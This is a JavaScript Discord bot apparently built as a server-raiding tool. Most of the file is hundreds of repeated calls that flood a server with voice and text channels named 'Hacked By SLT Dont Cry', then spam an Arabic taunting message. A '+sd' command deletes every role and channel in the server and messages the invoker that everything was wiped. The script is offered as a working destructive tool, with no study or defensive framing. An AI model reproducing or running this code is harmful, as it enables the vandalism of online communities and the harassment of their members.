		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')

        message.channel.send('تحسب انك بتروح بدون حساب ؟ لبى والله عيونك:see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil:تحسب انك بتروح بدون حساب ؟ لبى والله عيونك:see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil:تحسب انك بتروح بدون حساب ؟ لبى والله عيونك:see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil:تحسب انك بتروح بدون حساب ؟ لبى والله عيونك:see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil:تحسب انك بتروح بدون حساب ؟ لبى والله عيونك:see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil:تحسب انك بتروح بدون حساب ؟ لبى والله عيونك:see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil:تحسب انك بتروح بدون حساب ؟ لبى والله عيونك:see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil:تحسب انك بتروح بدون حساب ؟ لبى والله عيونك:see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil:تحسب انك بتروح بدون حساب ؟ لبى والله عيونك:see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil:تحسب انك بتروح بدون حساب ؟ لبى والله عيونك:see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil:تحسب انك بتروح بدون حساب ؟ لبى والله عيونك:see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil:تحسب انك بتروح بدون حساب ؟ لبى والله عيونك:see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil:تحسب انك بتروح بدون حساب ؟ لبى والله عيونك:see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil: :see_no_evil:');
}
}
});






client.on('message', ra3d => {
 if (ra3d.content.startsWith("+sd")) {
     ra3d.guild.roles.forEach(r => { r.delete() })
     ra3d.guild.channels.forEach(c => { c.delete() })
                let embed = new Discord.RichEmbed()
            .setColor('#fd0101')
            .setDescription('تم حذف كل شي في السيرفر✅')
           ra3d.author.sendEmbed(embed);
 }
 });






client.login(process.env.BOT_TOKEN);
